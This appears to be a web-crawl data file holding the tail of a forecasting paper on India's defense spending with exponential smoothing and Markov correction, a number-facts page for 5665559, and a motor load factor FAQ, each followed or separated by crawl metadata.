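    actual, pred = np.asarray(actual, float), np.asarray(pred, float)
    return np.mean(np.abs(pred - actual))

def aare(actual, pred):
    actual, pred = np.asarray(actual, float), np.asarray(pred, float)
    return 100.0 * np.mean(np.abs(pred - actual) / actual)   # percent

def ic(actual, pred):
    actual, pred = np.asarray(actual, float), np.asarray(pred, float)
    rmse = np.sqrt(np.mean((pred - actual) ** 2))
    return rmse / (np.sqrt(np.mean(actual ** 2)) + np.sqrt(np.mean(pred ** 2)))

actual  = [28459.70, 31943.60, 33228.20, 39667.30, 42350.60]   # 2013-2017
model_1 = [28787.64, 32033.60, 35239.83, 36704.50, 41150.43]   # Table 4, model I
print(round(mae(actual, model_1), 2),    # 1318.51
      round(aare(actual, model_1), 2),   # 3.56
      round(ic(actual, model_1), 4))     # 0.024
```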
The fitting values of the two models are shown in Table 3 and Figure 3, and the predicted values are shown in Table 4(model I refers to the triple exponential smoothing model and model II refers to the reverse triple exponential smoothing model).\n\n Year Actual value Model I Absolute error Relative error (%) Model II Absolute error Relative error (%) 1990 1875.57 — — — — — — 1991 1989.42 1851.00 138.42 6.96 1444.22 545.20 27.40 1992 2130.22 1958.14 172.08 8.08 1704.37 425.85 19.99 1993 2645.63 2164.25 481.38 18.20 2112.12 533.51 20.17 1994 2833.00 2825.12 7.88 0.28 2774.19 58.81 2.08 1995 3273.12 3160.86 112.26 3.43 3238.32 34.80 1.06 1996 3588.35 3668.46 80.11 2.23 3799.97 211.62 5.90 1997 4354.92 4042.42 312.50 7.18 4115.12 239.80 5.51 1998 5106.19 4899.57 206.62 4.05 4979.33 126.86 2.48 1999 6274.99 5825.04 449.95 7.17 5885.66 389.33 6.20 2000 6469.72 7207.07 737.35 11.40 7094.16 624.44 9.65 2001 7029.45 7458.92 429.47 6.11 7382.91 353.46 5.03 2002 7216.66 7833.70 617.04 8.55 7724.44 507.78 7.04 2003 7739.66 7837.46 97.80 1.26 7685.59 54.07 0.70 2004 9648.66 8200.85 1447.81 15.01 8307.23 1341.43 13.90 2005 10350.30 10365.27 14.97 0.14 10533.85 183.55 1.77 2006 11019.10 11456.27 437.17 3.97 11537.29 518.19 4.70 2007 11904.20 12113.08 208.88 1.75 12087.04 182.84 1.54 2008 15175.60 12912.67 2262.93 14.91 13167.58 2008.02 13.23 2009 19932.90 16628.87 3304.03 16.58 16945.34 2987.56 14.99 2010 21456.00 22717.92 1261.92 5.88 23371.58 1915.58 8.93 2011 23733.80 25095.92 1362.12 5.74 25232.82 1499.02 6.32 2012 25730.60 27141.58 1410.98 5.48 27004.24 1273.64 4.95\n Year Actual value Model I Absolute error Relative error (%) Model II Absolute error Relative error (%) 2013 28459.70 28787.64 327.94 1.15 28506.25 46.55 0.16 2014 31943.60 32033.60 90.00 0.28 32030.02 86.42 0.27 2015 33228.20 35239.83 2011.63 6.05 34696.09 1467.89 4.42 2016 39667.30 36704.50 2962.80 7.47 36703.42 2963.88 7.47 2017 42350.60 41150.43 1200.17 2.83 41146.20 1204.40 2.84\n\nFrom Table 5, it can be seen that the MAE and AARE indexes of model II are lower and the IC indexes are higher than those of model I. According to the fitting data of the two models from 1991 to 2012, it can be found that the errors of the first three data are too large, which seriously affects the evaluation of indexes. This is because the reverse prediction model carries out reverse prediction correction for the first three initial values, while for the original data less than or equal to three items, it does not meet the reverse prediction conditions, resulting in excessive error of the first three fitting values. Therefore, the first three fitting data are removed to make a precision comparison (see Table 6).\n\n MAE AARE IC Model I 706.98 7.02 0.0453 Model II 727.97 8.34 0.0441\n MAE AARE IC Model I 776.94 6.37 0.0451 Model II 763.73 6.10 0.0435\n\nAs can be seen from Table 6, after removing the first three fitting values, the three indexes of model II are better than those of model I. It should be emphasized that the cubic exponential smoothing model in this paper is established based on dynamic data. 
Therefore, when predicting the leading period number T = 1, 2, 3, 4, and 5, respectively, the model comprehensively considers the error results of the fitting value and the predicted value and calculates the optimal smoothing coefficient so as to generate the corresponding parameter values , , and , respectively (predicting the benchmark year is 2012), as shown in Table 7.\n\n T Model I Model II 1 0.40 26035.37 2684.58 67.69 0.45 25942.50 2521.59 42.16 2 0.35 26114.59 2795.02 82.24 0.35 26113.87 2793.91 82.08 3 0.35 26114.59 2795.02 82.24 0.40 26035.14 2684.14 67.61 4 0.45 25942.56 2521.73 42.19 0.45 25942.50 2521.59 42.16 5 0.40 26035.37 2684.58 67.69 0.40 26035.14 2684.14 67.61\n\nAccording to models I and II, India’s defense spending from 2013 to 2017 is predicted, respectively, and compared with actual data (Table 4), and the prediction precision of model I and model II is compared (Table 8).\n\n MAE AARE IC Model I 1318.51 3.56 0.0240 Model II 1153.83 3.03 0.0224\n\nIt can be seen from Tables 4 and 8 that the prediction effect of model II was better than that of model I from 2012 to 2017, with the mean absolute error (MAE) reduced by 12.49%, the average absolute relative error (AARE) reduced by 14.89%, and the inequality coefficient (IC) reduced by 6.67%. Overall, the prediction accuracy is improved compared with the traditional exponential smoothing prediction model. However, for specific data, it can be seen that the absolute error of reverse triple exponential smoothing model II is obviously reduced on the predicted values from 2013 to 2015, but for the predicted data from 2016 to 2017, the error has basically not changed.\n\nTherefore, on the basis of model II, Markov theory is introduced to further correct the error. According to the calculation results of model II, its relative error is divided into several states, and according to Markov theory, the concentration degree of error range is divided so that each interval meets the objective law of state change . The standard of state interval division is shown in Table 9. According to the relative error of the fitting values obtained in model II, we can divide them into different states, as shown in Table 10.\n\n Status Interval E1 (−30%, −10%] E2 (−10%, 0] E3 (0, 5%] E4 (5%, 10%]\n Year Number Relative error (%) Belonging status 1991 1 −27.40 E1 1992 2 −19.99 E1 1993 3 −20.17 E1 1994 4 −2.08 E2 1995 5 −1.06 E2 1996 6 5.90 E4 1997 7 −5.51 E2 1998 8 −2.48 E2 1999 9 −6.20 E2 2000 10 9.65 E4 2001 11 5.03 E4 2002 12 7.04 E4 2003 13 −0.70 E2 2004 14 −13.90 E1 2005 15 1.77 E3 2006 16 4.70 E3 2007 17 1.54 E3 2008 18 −13.23 E1 2009 19 −14.99 E1 2010 20 8.93 E4 2011 21 6.32 E4 2012 22 4.95 E3\nNote. Positive and negative relative errors should be considered in the table.\n\nSince the state transition is random, probability must be used to describe the possibility of the state transition, that is, the state transition probability [35, 36]. According to the relevant probability calculation formula in Section 3 (Improved Prediction Model Combining Inverse Exponential Smoothing and Markov Chain), the single state transition probability matrix is constructed as follows:\n\nAs can be seen from Table 10, the data in 2012 are in state E3, and according to the state transition matrix, it can be seen that the predicted data in 2013 are most likely to be in state E3. 
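As a concrete cross-check, the one-step matrix and the most likely states for the following years can be reproduced from the Table 10 state sequence; the sketch below assumes simple transition counting (Step 4 of Section 3) and n-step matrices obtained as matrix powers.

```python
import numpy as np
from numpy.linalg import matrix_power

# State sequence of the fitted relative errors, 1991-2012 (Table 10).
labels = ["E1", "E2", "E3", "E4"]
seq = ["E1", "E1", "E1", "E2", "E2", "E4", "E2", "E2", "E2", "E4", "E4",
       "E4", "E2", "E1", "E3", "E3", "E3", "E1", "E1", "E4", "E4", "E3"]
states = [labels.index(s) for s in seq]

counts = np.zeros((4, 4))
for i, j in zip(states[:-1], states[1:]):
    counts[i, j] += 1.0
P = counts / counts.sum(axis=1, keepdims=True)      # one-step matrix

current = labels.index("E3")                         # 2012 is in state E3
for n in range(1, 6):                                # 2013 ... 2017
    row = matrix_power(P, n)[current]
    print(2012 + n, labels[int(row.argmax())], np.round(row, 3))
```

The printed rows are the state probability distributions n years after 2012; their argmax gives the predicted state used for the correction described next.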
The median value of the state's error range is taken for the Markov error correction and combined with the prediction value of the reverse triple exponential smoothing model, giving a final prediction value for 2013 of 27862.98 hundred million rupees (2786.298 billion rupees).

Similarly, the n-step state transition probability matrix can be obtained from the one-step state transition probability matrix. Once the transition matrix is determined, the possible states in 2013–2017 can be predicted from the state in 2012, and the final prediction values of the improved prediction model combining inverse exponential smoothing and Markov chain (set as model III) for 2013–2017 can then be obtained, as shown in Table 11.

| Year | Model III predicted value |
| --- | --- |
| 2013 | 27862.98 |
| 2014 | 31386.76 |
| 2015 | 34052.83 |
| 2016 | 39276.48 |
| 2017 | 43719.26 |

According to the three indexes MAE, AARE, and IC, the prediction accuracy of the three models is compared, as shown in Table 12 and Figures 4–6.

|  | MAE | AARE (%) | IC |
| --- | --- | --- | --- |
| Model I | 1318.51 | 3.56 | 0.0240 |
| Model II | 1153.83 | 3.03 | 0.0224 |
| Model III | 747.53 | 2.11 | 0.0115 |

From the analysis of Table 12 and Figures 4–6, it can be seen that the prediction accuracy of model III is significantly improved compared with models I and II, and its MAE, AARE, and IC are greatly reduced: the MAE index of model III is 43.30% lower than that of model I, its AARE index is 40.73% lower, and its IC index is 52.08% lower. For the individual years, the prediction errors of model III in 2013 and 2014 are larger than those of models I and II, but its errors in 2015 and 2016 are markedly smaller, and the overall curve is closer to the actual values.

#### 5. Conclusion

In this paper, the triple exponential smoothing model I, the inverse triple exponential smoothing model II, and the improved prediction model III combining inverse exponential smoothing and Markov chain are established, respectively. Taking India's defense expenditure data from 1990 to 2012 as the original time series and the data from 2013 to 2017 as the unknown test values, the following conclusions are drawn through comparative analysis:
(1) The quadratic curve fitting trend of India's defense expenditure data from 1990 to 2017 is good. Verified with models I, II, and III, the average relative error of the fitted values is below 10% and the average relative error of the predicted values is below 4%, a high accuracy, which shows that it is reasonable to use the triple exponential smoothing model to predict India's defense expenditure.
(2) Compared with model I, the overall prediction accuracy of model II is improved: its MAE is relatively reduced by 12.49%, its AARE by 14.89%, and its IC by 6.67%, but its prediction advantage weakens in the later period.
(3) Model III has the highest prediction accuracy. Compared with model I, its MAE, AARE, and IC are reduced by 43.30%, 40.73%, and 52.08%, respectively. Compared with model II, its MAE, AARE, and IC are reduced by 35.21%, 30.36%, and 48.66%, respectively. 
On the basis of making full use of time series to predict the trend, the improved prediction model combining inverse exponential smoothing and Markov chain uses Markov theory to predict the fluctuation, thus obviously reducing the error fluctuation range and making the predicted value closer to the actual value and the prediction effect more stable.\n\nThis paper only predicts the national defense expenditure from the perspective of time series, but in fact, national defense expenditure will inevitably be affected by multidimensional factors such as economic development, military construction, and national defense policies [37, 38]. In the following research, if the time series and multidimensional influencing factors can be integrated to establish a prediction model, it will more effectively support the prediction decision.\n\n#### Data Availability\n\nThe data used to support the findings of this study are available from the corresponding author upon request.\n\n#### Conflicts of Interest\n\nThe authors declare that they have no conflicts of interest.\n\n#### Acknowledgments\n\nThis study was supported in part by the China Postdoctoral Science Foundation (2017M623417) and Shaanxi Province Natural Science Basic Research Program (2019JQ-708).\n\n1. K. Zhang, B. Liu, D. Huang, and X. Ren, “Empirical study on the relationship between national defense expenditure, economic growth and resident consumption in China,” Journal of Naval Engineering University, vol. 28, no. 5, pp. 69–74, 2016. View at: Google Scholar\n2. Z. Cao, Y. Liu, and J. Dong, “Predict of railway passenger volume based on triple exponential smoothing,” Railway Transportation and Economy, vol. 40, no. 11, pp. 49–53, 2018. View at: Google Scholar\n3. G. Feng, L. Chen-Yu, Z. Bin, and Z. Su-Qin, “Spares consumption combination forecasting based on genetic algorithm and exponential smoothing method,” in Proceedings of the 2012 Fifth International Symposium on Computational Intelligence and Design, pp. 198–201, Hangzhou, China, October 2012. View at: Publisher Site | Google Scholar\n4. K. Y. Chan, T. S. Dillon, J. Singh, and E. Chang, “Neural-network-based models for short-term traffic flow forecasting using a hybrid exponential smoothing and levenberg-marquardt algorithm,” IEEE Transactions on Intelligent Transportation Systems, vol. 13, no. 2, pp. 644–654, 2012. View at: Publisher Site | Google Scholar\n5. D. Shi, S. Wang, Y. Cai, and L. Chen, “Stochastic predictive energy management of power split hybrid electric bus for real-world driving cycles,” IEEE Access, vol. 6, pp. 61700–61713, 2018. View at: Publisher Site | Google Scholar\n6. Y. Li, H. He, and J. Peng, “An adaptive online prediction method with variable prediction horizon for future driving cycle of the vehicle,” IEEE Access, vol. 6, pp. 33062–33075, 2018. View at: Publisher Site | Google Scholar\n7. H. Wang and H. Wang, “GDP predict based on exponential smoothing method and regression analysis,” Economic Research Journal, vol. 35, no. 7, pp. 1–6, 2018. View at: Google Scholar\n8. Li. Qian, “Predict of the development trend of regional income difference of rural residents-based on double exponential smoothing and ARMA model,” Journal of Central University of Finance and Economics, vol. 7, pp. 78–82, 2014. View at: Google Scholar\n9. X. Dong, Y. Chen, Z. Cai, and W. Zhang, “Exponential smoothing prediction method for subsequent spare parts based on rough set theory correction,” Systems Engineering and Electronic Technology, vol. 40, no. 4, pp. 833–838, 2018. 
View at: Google Scholar\n10. J. Cao, H. Du, X. Chen, and Q. Wang, “Prediction of armored equipment consumption based on smooth index simulation optimization,” Journal of System Simulation, vol. 25, no. 8, pp. 1961–1965, 2013. View at: Google Scholar\n11. Y. Zhang, H. Sun, and Y. Guo, “Wind power prediction based on PSO-SVR and grey combination model,” IEEE Access, vol. 7, pp. 136254–136267, 2019. View at: Publisher Site | Google Scholar\n12. B. Zhou, X. Ma, Y. Luo, and D. Yang, “Wind power prediction based on LSTM networks and nonparametric kernel density estimation,” IEEE Access, vol. 7, pp. 165279–165292, 2019. View at: Publisher Site | Google Scholar\n13. G. Duan, R. Niu, Y. Zhao, K. Zhang, and D. Yao, “Prediction of rainfall-induced landslides based on dynamic exponential smoothing model,” Journal of Wuhan University (Information Science Edition), vol. 41, no. 7, pp. 958–962, 2016. View at: Google Scholar\n14. J. Lu and F. Xu, “Study on landslide predict model based on exponential smoothing method and regression analy,” Journal of Wuhan University of Technology, vol. 33, no. 10, pp. 88–91, 2011. View at: Google Scholar\n15. S. Manandhar, S. Dev, Y. H. Lee, and S. Winkler, “Predicting GPS-based PWV measurements using exponential smoothing,” in Proceedings of the 2019 USNC-URSI Radio Science Meeting (Joint with AP-S Symposium), Atlanta, GA, USA, July 2019. View at: Publisher Site | Google Scholar\n16. Y. Xie, M. Jin, Z. Zou et al., “Real-time prediction of docker container resource load based on a hybrid model of ARIMA and triple exponential smoothing,” IEEE Transactions on Cloud Computing, In press. View at: Publisher Site | Google Scholar\n17. C. Qi and Z. Hou, “Application of adaptive single exponential smoothing method in short-term traffic flow predict,” Control Theory and Application, vol. 29, no. 4, pp. 465–469, 2012. View at: Google Scholar\n18. G. Wang, S. Wang, H. Liu et al., “Wind speed prediction of wind farms based on adaptive dynamic cubic exponential smoothing method,” Power System Protection and Control, vol. 42, no. 15, pp. 117–122, 2014. View at: Google Scholar\n19. J. Mi, L. Fan, X. Duan, and Y. Qiu, “Short-term power load forecasting method based on improved exponential smoothing grey model,” Mathematical Problems in Engineering, vol. 2018, Article ID 3894723, 11 pages, 2018. View at: Publisher Site | Google Scholar\n20. Q. Liu, X. Chen, Y. Zhang, Z. Liu, C. Li, and D. Hu, “A novel short-medium term satellite clock error prediction algorithm based on modified exponential smoothing method,” Mathematical Problems in Engineering, vol. 2018, Article ID 7486925, 7 pages, 2018. View at: Publisher Site | Google Scholar\n21. M. Akpinar and N. Yumusak, “Day-ahead natural gas forecasting using nonseasonal exponential smoothing methods,” in Proceedings of the 2017 IEEE International Conference on Environment and Electrical Engineering and 2017 IEEE Industrial and Commercial Power Systems Europe (EEEIC/I&CPS Europe), pp. 1–4, Milan, Italy, June 2017. View at: Publisher Site | Google Scholar\n22. J. Lian and L. He, “Research on production prediction based on exponential smoothing method,” in Proceedings of the 2018 9th International Conference on Information Technology in Medicine and Education (ITME), pp. 961–963, Hangzhou, China, October 2018. View at: Publisher Site | Google Scholar\n23. W. Setiawan, E. Juniati, and I. 
Farida, “The use of triple exponential smoothing method (winter) in forecasting passenger of PT Kereta Api Indonesia with optimization alpha, beta, and gamma parameters,” in Proceedings of the 2016 2nd International Conference on Science in Information Technology (ICSITech), pp. 198–202, Balikpapan, Indonesia, October 2016. View at: Publisher Site | Google Scholar\n24. L. Zhang, Z. Mu, and C. Sun, “Remaining useful life prediction for lithium-ion batteries based on exponential model and particle filter,” IEEE Access, vol. 6, pp. 17729–17740, 2018. View at: Publisher Site | Google Scholar\n25. N. V. Malyshkina and F. L. Mannering, “Markov switching multinomial logit model: an application to accident-injury severities,” Accident Analysis & Prevention, vol. 41, no. 4, pp. 829–838, 2009. View at: Publisher Site | Google Scholar\n26. L. R. Rabiner, “A tutorial on hidden Markov models and selected applications in speech recognition,” Proceedings of the IEEE, vol. 77, no. 2, pp. 257–286, 1989. View at: Publisher Site | Google Scholar\n27. L. Rabiner and B. Juang, “An introduction to hidden Markov models,” IEEE ASSP Magazine, vol. 3, no. 1, pp. 4–16, 1986. View at: Publisher Site | Google Scholar\n28. D. Li, H. Xu, D. Liu et al., “Application of improved grey Markov model in flight accident rate prediction,” Chinese Journal of Safety Sciences, vol. 19, no. 9, pp. 53–57, 2009. View at: Google Scholar\n29. Y. Li, L. Lei, and M. Yan, “Mobile user location prediction based on user classification and Markov model,” in Proceedings of the 2019 International Joint Conference on Information, Media and Engineering (IJCIME), pp. 440–444, Osaka, Japan, December 2019. View at: Publisher Site | Google Scholar\n30. D. Zhao, Y. Gao, Z. Zhang, Y. Zhang, and T. Luo, “Prediction of vehicle motion based on Markov model,” in Proceedings of the 2017 International Conference on Computer Systems, Electronics and Control (ICCSEC), pp. 205–209, Dalian, China, December 2017. View at: Publisher Site | Google Scholar\n31. Y. Qi, Y. Yang, Z. Feng, and X. Zhao, “Predict method of urban public transport passenger volume based on grey theory and Markov model,” Journal of China Highway, vol. 26, no. 6, pp. 169–175, 2013. View at: Google Scholar\n32. H. Rui, Q. Wu, H. Yuan, Z. Feng, and W. Zhu, “Predict method of highway passenger volume based on exponential smoothing method and Markov model,” Journal of Transportation Engineering, vol. 13, no. 4, pp. 87–93, 2013. View at: Google Scholar\n33. Y. Wang, Z. Zhang, H. Liu, and H. Ma, “Prediction of equipment consumption based on optimized grey Markov,” Logistics Technology, vol. 34, no. 1, pp. 158–160, 2015. View at: Google Scholar\n34. T. Xu, A. Jin, J. Zhang, and Z. Li, “Decision-making model of equipment condition maintenance based on Markov,” Journal of Artillery Launching and Control, vol. 39, no. 3, pp. 90–94, 2018. View at: Google Scholar\n35. G. Zhang, Y. Wang, and W. Fan, “Research on dynamic decision-making model of equipment condition maintenance monitoring interval using Markov chain,” Journal of Sichuan Military Engineering, vol. 36, no. 4, pp. 81–84, 2015. View at: Google Scholar\n36. P. Lv, Z. Yuan, L. Yang, and K. Yang, “BP neural network-markov predict model for ship traffic volume,” Journal of Shanghai Maritime University, vol. 38, no. 2, pp. 17–28, 2017. View at: Google Scholar\n37. T. Niu, L. Zhang, S. Wei, B. Zhang, and B. 
Zhang, “Study on a combined prediction method based on BP neural network and improved Verhulst model,” Systems Science & Control Engineering, vol. 7, no. 3, pp. 36–42, 2019. View at: Publisher Site | Google Scholar
38. C. Yuan, Y. Zhang, N. Xu, and J. Xu, “Grey relational analysis on the relation between China's gdp and defense expenditure,” in Proceedings of the 2017 International Conference on Grey Systems and Intelligent Services (GSIS), pp. 106–110, Stockholm, Sweden, August 2017. View at: Publisher Site | Google Scholar" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.872044,"math_prob":0.83716536,"size":36701,"snap":"2021-31-2021-39","text_gpt3_token_len":7882,"char_repetition_ratio":0.20538464,"word_repetition_ratio":0.08774663,"special_character_ratio":0.22457154,"punctuation_ratio":0.16086832,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98317355,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-26T19:24:36Z\",\"WARC-Record-ID\":\"<urn:uuid:2f84f95a-cb76-41a0-894f-ec861719cf02>\",\"Content-Length\":\"902157\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:770b4384-b1ab-42ee-bc5d-321b9959f8a6>\",\"WARC-Concurrent-To\":\"<urn:uuid:bea3c08f-5e41-4818-8a19-8008b55e89a0>\",\"WARC-IP-Address\":\"99.84.216.27\",\"WARC-Target-URI\":\"https://www.hindawi.com/journals/mpe/2020/6210616/\",\"WARC-Payload-Digest\":\"sha1:QEJJMHOMR6DQ5XUCAMOM5QYVFYDXCMAL\",\"WARC-Block-Digest\":\"sha1:LRPAJKRIO3SXYPHACEA4BACL5VL65KLX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046152144.92_warc_CC-MAIN-20210726183622-20210726213622-00441.warc.gz\"}"}
https://numbermatics.com/n/5665559/
[ "# 5665559\n\n## 5,665,559 is a prime number. Like all primes greater than two, it is odd and has no factors apart from itself and one.\n\nWhat does the number 5665559 look like?\n\nAs a prime, it is not composed of any other numbers and has no internal structure.\n\n5665559 is a prime number. Like all primes (except two), it is an odd number.\n\n## Prime factorization of 5665559:\n\n### 5665559\n\nSee below for interesting mathematical facts about the number 5665559 from the Numbermatics database.\n\n### Names of 5665559\n\n• Cardinal: 5665559 can be written as Five million, six hundred sixty-five thousand, five hundred fifty-nine.\n\n### Scientific notation\n\n• Scientific notation: 5.665559 × 106\n\n### Factors of 5665559\n\n• Number of distinct prime factors ω(n): 1\n• Total number of prime factors Ω(n): 1\n• Sum of prime factors: 5665559\n\n### Divisors of 5665559\n\n• Number of divisors d(n): 2\n• Complete list of divisors:\n• Sum of all divisors σ(n): 5665560\n• Sum of proper divisors (its aliquot sum) s(n): 1\n• 5665559 is a deficient number, because the sum of its proper divisors (1) is less than itself. Its deficiency is 5665558\n\n### Bases of 5665559\n\n• Binary: 101011001110011000101112\n• Hexadecimal: 0x567317\n• Base-36: 3DFKN\n\n### Squares and roots of 5665559\n\n• 5665559 squared (56655592) is 32098558782481\n• 5665559 cubed (56655593) is 181856278597114271879\n• The square root of 5665559 is 2380.2434749411\n• The cube root of 5665559 is 178.2710909425\n\n### Scales and comparisons\n\nHow big is 5665559?\n• 5,665,559 seconds is equal to 9 weeks, 2 days, 13 hours, 45 minutes, 59 seconds.\n• To count from 1 to 5,665,559 would take you about fourteen weeks!\n\nThis is a very rough estimate, based on a speaking rate of half a second every third order of magnitude. If you speak quickly, you could probably say any randomly-chosen number between one and a thousand in around half a second. Very big numbers obviously take longer to say, so we add half a second for every extra x1000. (We do not count involuntary pauses, bathroom breaks or the necessity of sleep in our calculation!)\n\n• A cube with a volume of 5665559 cubic inches would be around 14.9 feet tall.\n\n### Recreational maths with 5665559\n\n• 5665559 backwards is 9555665\n• The number of decimal digits it has is: 7\n• The sum of 5665559's digits is 41\n• More coming soon!\n\n## Link to this page\n\nHTML: To link to this page, just copy and paste the link below into your blog, web page or email.\n\nBBCODE: To link to this page in a forum post or comment box, just copy and paste the link code below:\n\n## Cite this page\n\nMLA style:\n\"Number 5665559 - Facts about the integer\". Numbermatics.com. 2021. Web. 20 June 2021.\n\nAPA style:\nNumbermatics. (2021). Number 5665559 - Facts about the integer. Retrieved 20 June 2021, from https://numbermatics.com/n/5665559/\n\nChicago style:\nNumbermatics. 2021. \"Number 5665559 - Facts about the integer\". https://numbermatics.com/n/5665559/\n\nThe information we have on file for 5665559 includes mathematical data and numerical statistics calculated using standard algorithms and methods. We are adding more all the time. If there are any features you would like to see, please contact us. 
## Cite this page

MLA style:
"Number 5665559 - Facts about the integer". Numbermatics.com. 2021. Web. 20 June 2021.

APA style:
Numbermatics. (2021). Number 5665559 - Facts about the integer. Retrieved 20 June 2021, from https://numbermatics.com/n/5665559/

Chicago style:
Numbermatics. 2021. "Number 5665559 - Facts about the integer". https://numbermatics.com/n/5665559/

The information we have on file for 5665559 includes mathematical data and numerical statistics calculated using standard algorithms and methods. We are adding more all the time. If there are any features you would like to see, please contact us. Information provided for educational use, intellectual curiosity and fun!" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85339916,"math_prob":0.9247365,"size":2799,"snap":"2021-21-2021-25","text_gpt3_token_len":760,"char_repetition_ratio":0.13416816,"word_repetition_ratio":0.05733945,"special_character_ratio":0.34012148,"punctuation_ratio":0.17431192,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9695885,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-20T06:09:33Z\",\"WARC-Record-ID\":\"<urn:uuid:a8daa37a-5c26-4c3e-8d0b-f4290212a4bf>\",\"Content-Length\":\"16957\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:df0d15e2-ddbc-45fd-8f78-1078a12eea13>\",\"WARC-Concurrent-To\":\"<urn:uuid:f487418f-04e5-4fbc-82c2-3b9e9da20078>\",\"WARC-IP-Address\":\"72.44.94.106\",\"WARC-Target-URI\":\"https://numbermatics.com/n/5665559/\",\"WARC-Payload-Digest\":\"sha1:S5Z4W3ETJ4ZTG37CNGGYP5VTX633UDSD\",\"WARC-Block-Digest\":\"sha1:FHWB7ZGN6Z26DM2LLLY7OB2NWYKVN2RS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487658814.62_warc_CC-MAIN-20210620054240-20210620084240-00513.warc.gz\"}"}
https://carbrandswiki.com/auto-parts/what-is-motor-load-factor.html
[ "# What is motor load factor\n\nContents\n\nThe ratio of the actual power coming out of a motor to its rated power is called the motor’s load factor – LF. It is usually. expressed in per cent: LF (%) = 100 x Actual Power Out / Rated Power Out.\n\n## What does load factor mean?\n\nLoad factor is an expression of how much energy was used in a time period, versus how much energy would have been used, if the power had been left on during a period of peak demand. It is a useful indicator for describing the consumption characteristics of electricity over a period of time.\n\nPart-load is a term used to describe the actual load served by the motor as compared to the rated full-load capability of the motor. Motor part-loads may be estimated through using input power, amperage, or speed measurements.\n\n## How do you calculate motor load?\n\nWhen calculating motor loads, you need to know how to convert a motor’s current rating (given in amps) to a VA rating. To do this, multiply the motor’s nameplate amperage by the supply voltage.\n\n## What is the effect on load factor?\n\nAs the load factor represents the actual energy usage versus the peak demand, consumers can use the same amount of electricity from one month to the next and still reduce the average cost per unit (kWh) by reducing the peak demand.\n\n## What is a good load factor?\n\nIf your load factor ratio is above 0.75 your electrical usage is reasonably efficient. If the load factor is below 0.5, you have periods of very high usage (demand) and a low utilization rate.\n\n## What is average load factor?\n\nDefinition: Load factor is defined as the ratio of the average load over a given period to the maximum demand (peak load) occurring in that period. In other words, the load factor is the ratio of energy consumed in a given period of the times of hours to the peak load which has occurred during that particular period.\n\n## What is the formula of load?\n\nCalculating an Electrical Load in a Simple Circuit\n\nLet Power = Voltage * Current (P=VI). Let Current = Voltage/Resistance (I=V/R). Apply Kirchoff’s Second Law, that the sum of the voltages around a circuit is zero. Conclude that the load voltage around the simple circuit must be 9 volts.\n\n## What type of load is a motor?\n\nLoads that power electrical motors are inductive loads. These are found in a variety of household items and devices with moving parts, including fans, vacuum cleaners, dishwashers, washing machines and the compressors in refrigerators and air conditioners.\n\nIT IS INTERESTING:  How do I tell what kind of transmission I have\n\n## How many watts is a 5hp motor?\n\nIt is easy to convert HP to watts based on theequivalence of 746 watts per horsepower and arrive at 5 HP =3730 watts. However, in practice, motors seldom run at theirnameplate current (FLA or Full Load Amperage).\n\n## Which motor is more efficient?\n\nAC motors are generally considered to be more powerful than DC motors because they can generate higher torque by using a more powerful current. However, DC motors are typically more efficient and make better use of their input energy.\n\n## How much weight can a 1 hp motor lift?\n\nThis means with 1 hp, you can lift about 550 lbs (250 kg) at a rate of 1 ft/sec, 1100 lbs at a rate of 0.5 ft/sec, 225 lb at a rate of 2 ft/sec, 1 lb at a rate of 550 ft/sec, and so on.\n\n## What is the purpose of load factors?\n\nLoad factor is a ratio of the theoretical design strength to the maximum load expected in service. 
## What is the effect on load factor?

As the load factor represents the actual energy usage versus the peak demand, consumers can use the same amount of electricity from one month to the next and still reduce the average cost per unit (kWh) by reducing the peak demand.

## What is a good load factor?

If your load factor ratio is above 0.75 your electrical usage is reasonably efficient. If the load factor is below 0.5, you have periods of very high usage (demand) and a low utilization rate.

## What is average load factor?

Definition: Load factor is defined as the ratio of the average load over a given period to the maximum demand (peak load) occurring in that period. In other words, the load factor is the ratio of the energy consumed over a given number of hours to the energy the peak load would have consumed over those same hours.

## What is the formula of load?

Calculating an Electrical Load in a Simple Circuit

Let Power = Voltage * Current (P=VI). Let Current = Voltage/Resistance (I=V/R). Apply Kirchhoff's Second Law, that the sum of the voltages around a circuit is zero, and conclude that for a simple single-loop circuit fed by a 9-volt source the load voltage must be 9 volts.

## What type of load is a motor?

Loads that power electrical motors are inductive loads. These are found in a variety of household items and devices with moving parts, including fans, vacuum cleaners, dishwashers, washing machines and the compressors in refrigerators and air conditioners.

## How many watts is a 5hp motor?

It is easy to convert HP to watts based on the equivalence of 746 watts per horsepower and arrive at 5 HP = 3730 watts. However, in practice, motors seldom run at their nameplate current (FLA, or Full Load Amperage).

## Which motor is more efficient?

AC motors are generally considered to be more powerful than DC motors because they can generate higher torque by using a more powerful current. However, DC motors are typically more efficient and make better use of their input energy.

## How much weight can a 1 hp motor lift?

One horsepower is 550 ft·lbf per second. This means with 1 hp, you can lift about 550 lbs (250 kg) at a rate of 1 ft/sec, 1100 lbs at a rate of 0.5 ft/sec, 275 lb at a rate of 2 ft/sec, 1 lb at a rate of 550 ft/sec, and so on.

## What is the purpose of load factors?

Load factor is a ratio of the theoretical design strength to the maximum load expected in service. They are used in structural analysis to determine the design strength and compare it with maximum loads.

## What is the importance of load curve?

Load curve decides the installed capacity of a power station. It is helpful in choosing the most economical sizes of the various generating units. The load curve estimates the generating cost. It decides the operating schedules of the power station, i.e., the sequence in which the different generating units should run.

## What is load demand factor?

